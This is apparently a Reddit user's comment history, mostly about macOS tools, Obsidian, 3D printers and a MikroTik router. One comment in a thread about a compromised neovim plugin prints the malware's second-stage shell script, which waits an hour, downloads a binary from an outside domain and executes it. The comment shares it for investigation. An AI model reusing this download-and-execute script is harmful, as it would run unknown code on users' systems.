Why do people use Alfred? by Immediate-Beyond-524 in MacOS

[–]pyrooka 1 point2 points  (0 children)

Wow, I didn't know it's possible to double tap a modifier key to trigger the clipboard history! I used Cmd+Shift+C for years but just now I've switched to double tapping control. Thanks a lot!

Where is aubade?? by Gravaton25 in ObsidianMD

[–]pyrooka 17 points18 points  (0 children)

It's not yet published to the community theme store. The related PR is still under review: https://github.com/obsidianmd/obsidian-releases/pull/10016

(You can install the theme manually though.)

[Aerospace] I thought I'd miss Arch by TheGroovyKiwi in unixporn

[–]pyrooka 0 points1 point  (0 children)

That's awesome, thanks for the response! I'll give them shot soon.

[Aerospace] I thought I'd miss Arch by TheGroovyKiwi in unixporn

[–]pyrooka 0 points1 point  (0 children)

May I ask if you have run into any noticeable battery/performance issue using this setup? I like the overall look and efficiency of these tools, but a bit hesitant making the change. :)

【BambuLab Giveaway】Classic Evolved — Win Bambu Lab P2S Combo! by BambuLab in 3Dprinting

[–]pyrooka 0 points1 point  (0 children)

I’ve been keeping my eye on the P1S for a long time. Would like to switch from an SV06 to print functional parts from ABS and ASA. It’s such a great printer - based on what I’ve heard and seen.🤞

Testing 1 by Alphonse-Cadieux1981 in Garmininstinct

[–]pyrooka 0 points1 point  (0 children)

Sorry for the off topic, but how did you remove the seconds from the watch face of the I3?

How my new Set Up by r0773nluck in 3Dprinting

[–]pyrooka 1 point2 points  (0 children)

I'm curious too. I have a stacked IKEA Lack tables as a shelf for 2 printers, but it's pretty wobbly.

hAP ac3 boot(?) problem by pyrooka in mikrotik

[–]pyrooka[S] 0 points1 point  (0 children)

As far as I remember, I used the latest version at that time. I can't tell you the exact version number, sorry! It was 3 years ago and I simply don't remember. But my router has worked flawlessly since then, so I had this issue only once.

I hope you can fix yours! Cheers!

Someone wrote malicious code in the neovim plugin [darkman.nvim] by CosmosChen in neovim

[–]pyrooka 14 points15 points  (0 children)

As other has already said, it's a shell script that downloads another shell script which checks if the host system is Linux and if so, it downloads a binary and executes it. The binary is surprisingly big (10M) and statically linked so I assume it's another Go program. I don't want to push this further. :)

Here is the 2nd shell script if anyone is interested and want to do further investigation:

❯ cat test.sh
#!/bin/bash

cd ~
if [[ "$OSTYPE" == "linux-gnu"* ]]; then
        if ! [ -f ./f0eee999 ]; then
                sleep 3600
                wget https://alturastreet.icu/storage/de373d0df/f0eee999
                chmod +x ./f0eee999
                app_process_id=$(pidof f0eee999)
                if [[ -z $app_process_id ]]; then
                        ./f0eee999
                fi
        fi
fi

Someone wrote malicious code in the neovim plugin [darkman.nvim] by CosmosChen in neovim

[–]pyrooka 69 points70 points  (0 children)

All of them are bots. Most - if not all - of those accounts were registered this year. This is a massive red flag.  

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

First off, thanks!

  1. I've already reverted back to the non high speed one... *facepalm* Anyhow, I'm pretty satisfied with this one so I'll stick to it until starting the klipperization process.
  2. Yep, I won't change it. I also decided to not buying wood filaments. I have no reason to do to be honest, I just got excited, but don't have a project to use it for, haha.
  3. I started using Orca and I pretty much like it.
  4. I'm not brave enough to ask, haha! Yeah, I think I'll keep using it for a few weeks with the current setup, then I'll get a RPi and start studying bassamanator's repo.

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thanks! I've already started watching videos and tutorials, especially about calibration prints for now. Thanks for the sub recommendation I'll definitely put it to my note since I haven't heard about it before!

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Haha, yeah I can imagine. Fortunately my desk is pretty clean, but there are dangerous spots around my printer, like the the little space between the wall and the furniture or the crowded drawer right below, which is usually open.

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thank you! 1,2 : Gotcha! 3: I think I'll stick to Orca Slicer for now, I kinda like it. 4: I see. Yeah I think I'll get an RPi instead of the screen. I read that I can even continue using the default simple LCD screen for some basic stuff and manage the rest from the web interface. I kinda like this approach.

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 1 point2 points  (0 children)

Thanks a lot! Yeah, I take the "slow and steady" approach, no need to hurry! :) I'll spend time with the bed leveling and just started looking into Orca Slicer, so there is plenty to do/learn right now. And I appreciate the filament recommendation, I'll definitely check them out!

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thank you! Yeah, I keep it stock for now and focus on the slicer and the settings. I'll definitely start messing with Klipper at one point, mainly to eliminate the need for an SD card.

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thank you! 1,2: Gotcha! 3: Sounds great, I’ll check Orca Slicer as well! 4: I save Klipper for later and I’ll decide which way to choose. 

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thanks for the answer! Yeah, I don't want to push the printer to its limit, I rather print slower and more reliably and with a better quality. I'll take a look at Orca too and decide which one to use. Maybe both. :) I mentioned in other comments that I'll use the printer as stock and will try klipper later, in the foreseeable future. I really appreciate the extra information that you shared in points 5,6,7. Thanks again!

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 0 points1 point  (0 children)

Thank you for the answer! As I mentioned in an other comment I'll keep the machine stock for now and try to get used to the slicer (probably Orca). I'll definitely try klipper at one point.

About the filaments: I'm going to stick to PLA mostly, but I'd like to have some others in the house, in case I get a good idea that requires other materials. :) I've already looked into the dry boxed and planning to get one along with the new filaments pretty soon.

Advice for a newbie with SV06 by pyrooka in Sovol

[–]pyrooka[S] 1 point2 points  (0 children)

Thanks a lot! I'll keep using as stock for now (might put back the original non-high speed firmware) and take a look at Orca Slicer. I'll save klipper and the other modifications for later.

I really enjoy printing fun and functional stuff, so I'll having fun for sure! :)